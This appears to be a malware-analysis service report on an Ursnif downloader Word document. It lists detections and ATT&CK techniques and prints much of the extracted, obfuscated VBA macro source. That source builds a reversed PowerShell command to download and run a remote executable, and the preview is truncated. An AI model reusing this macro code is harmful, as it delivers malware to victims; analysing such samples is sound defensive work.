MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function to execute a command, which is obfuscated but appears to be constructing a command line for execution. The ClamAV heuristic identifies it as a downloader, suggesting the primary purpose is to fetch and execute additional malware. The specific command constructed by the VBA script is 'cmd /V:ON/C set xDQ9= ;kaerb;BUact};hctac};kaerb;BUa', which is likely part of a payload delivery mechanism.
Heuristics 7
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4716 bytes |
SHA-256: 4b78e5fd21daa0f9998e5f9fa9a129416d1360e7333a2059174debdfdc42ae7d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "lAqwHRjNiRYfA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "qs" + "330657398"
VBA.Shell CleanString(WQ) + itZhsjiikN + TZiOHpiF + oISAjo + wFRqQii + VwQbimASj + OnCPhILsEzv + PoamoRIfXFMwQN, 87 - 87
Hour "jDuoF" + "rhpR"
Hour "jiKIE" + "125" + "lfcCaWrJn" + "Kf"
End Sub
Attribute VB_Name = "UUXRlAokDvKlrm"
Function oISAjo()
On _
Error _
Resume _
Next
Hour "JdanUiwFqMi" + "4877"
Hour "1793" + "wAw"
Hour "vSW" + "dnzjDjJh"
FvudvtwVt = "cmd /V" + "^" + ":^ON/" + "C" + Chr(1 + 0 + 1 + 0 + 32) + "^" + "s" + "^et x^D" + "Q^9"
Hour "CtkwviSBrrJ" + "162471674"
Hour "LvObwViCuhi" + "UUM"
Hour "295272092" + "2147"
Hour "TsfPwmBL" + "rVTrFvF"
Hour "3081" + "132716038" + "t" + "449"
bwQjoob = "=" + " ^ " + " ^ ^ " + "^ " + " ^ ^ ^" + " ^ " + " ^ " + "}^}^{h" + "ct^" + "ac}" + ";kaer^" + "b^;B^U"
Hour "8866" + "JNQN" + "JiCbmE" + "1907"
Hour "26645297" + "kkwWdqjoZ" + "WIdPHbhizzISrM" + "3787"
Hour "69" + "6865" + "FLP" + "RF"
Hour "204056018" + "fAFlPki" + "VbQ" + "151242311"
Hour "4075" + "109247342" + "EdzOojIM" + "o"
FNfRIpDTowk = "a^$^ m" + "e^t^I^-" + "^e^k" + "ovn^I;" + ")^B^U^" + "a$^ ^,d" + "^fB$(" + "^" + "el" + "^i^F^d^" + "a^o^" + "lnw^o^D"
Hour "uF" + "t" + "btI" + "151402032"
Hour "320272536" + "sa" + "1485" + "4011"
NrjJB = "^" + ".N^s" + "i$^{" + "^" + "yr" + "^t{)u^" + "w" + "o$ ni^" + " d^" + "f^B^$(^"
Hour "kHih" + "Rfk"
Hour "drHji" + "523290374" + "ChiPu" + "M"
Hour "6526" + "tmlsK" + "joildMujK" + "506965484"
Hour "Fvlrz" + "305388675"
Hour "jIbnztQNRToGk" + "UG" + "9962" + "YFF"
Hour "63657352" + "2921"
wZhWkzAX = "hc" + "^a" + "^er^" + "of;'^ex" + "^e" + "^.'+q"
Hour "435360144" + "80683593" + "GlzFCfCHu" + "wUnsPwWLDK"
Hour "6062" + "9772"
Hour "7631" + "SPKI"
Hour "2271" + "3222" + "jvrlvJDznjNdqM" + "67045211"
Gphzd = "iI$^+" + "^'\'+c" + "^i^" + "lb^u" + "^p:" + "v" + "n^e$^" + "=^BUa^" + "$;'^4" + "7^7' =" + "^ q" + "i"
Hour "248918827" + "4069" + "Yv" + "lcjWZB"
Hour "lsBPZj" + "ILAoFm"
ZFQiuvJ = "I$;" + ")^'@^'(" + "^t" + "^i" + "l" + "p^S.'" + "n^k" + "^t^" + ".5^g^d=" + "^l?^" + "p^h^"
oISAjo = FvudvtwVt + bwQjoob + FNfRIpDTowk + NrjJB + wZhWkzAX + Gphzd + ZFQiuvJ
Hour "294450924" + "JnDKLjFf" + "FoP" + "PTAJFqWCjFH"
Hour "wFbuhtfTKimiL" + "385"
End Function
Function wFRqQii()
On _
Error _
Resume _
Next
Hour "172024154" + "rNm" + "vHMtaMpsitEqdc" + "VrmZhwwF"
Hour "wtIz" + "2826"
FFTREiYvRj = "p^.^" + "hd^" + "s^ano^u" + "^h/^" + "Y^U^Y/" + "^moc."
Hour "DWFn" + "A"
Hour "B" + "5447" + "2386" + "pFhddwC"
Hour "9010" + "P"
Hour "100173091" + "GIPBuChDOzd" + "cXP" + "hN"
sqvVhvmb = "c^s" + "a^d" + "sabn^e^" + "w^q^j" + "i//:^p^" + "t^t" + "h^'" + "^=^u" + "^wo$^;^" + "tne^i" + "^lCbe^W" + "^.t^eN"
Hour "ipOc" + "R" + "bsnS" + "lDO"
Hour "frO" + "BRh" + "rsDVa" + "47604657"
SbLrb = " ^tce" + "jbo" + "-^we" + "n^=" + "N^s^i^$" + " ^l" + "le^" + "h^sre^" + "w"
Hour "2146" + "1349"
Hour "1487" + "WWj"
Hour "sSw" + "2678" + "njY" + "422190994"
Hour "NcdG" + "4947" + "IAzWtcqil" + "487046132"
Hour "RoMHvmmT" + "LJh"
twDMGoLwWA = "^" + "o^p&&^f" + "^or /" + "^L %N ^" + "in (^2" + "^"
Hour "273226811" + "142406773"
Hour "Lp" + "LBzLDwsbIXBp" + "8104" + "2145"
Hour "YCDYRijanXs" + "763"
Hour "Tm" + "TFFbQQVD"
zswZi = "61^" + ";-1;0)" + "d^" + "o s" + "^e^t " + "Aa^E^M=" + "!" + "Aa^" + "E^M!" + "!x^D" + "Q^9" + ":~%N"
Hour "DlUanKUAmjfPwA" + "pQb" + "KBzaV" + "3879"
zKidPz = ",1!&" + "&^i^f " + "%N ^l" + "s^" + "s" + " ^1"
Hour "279370980" + "OpdvEKzUcN" + "pIw" + "f"
Hour "JLilXkuPqvlCjq" + "5627" + "K" + "Xhubf"
TGOCMapdp = " c^a^" + "ll" + " " + "%" + "Aa" + "^E^" + "M:^*^" + "A" + "a" + "EM!^="
wFRqQii = FFTREiYvRj + sqvVhvmb + Sb
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.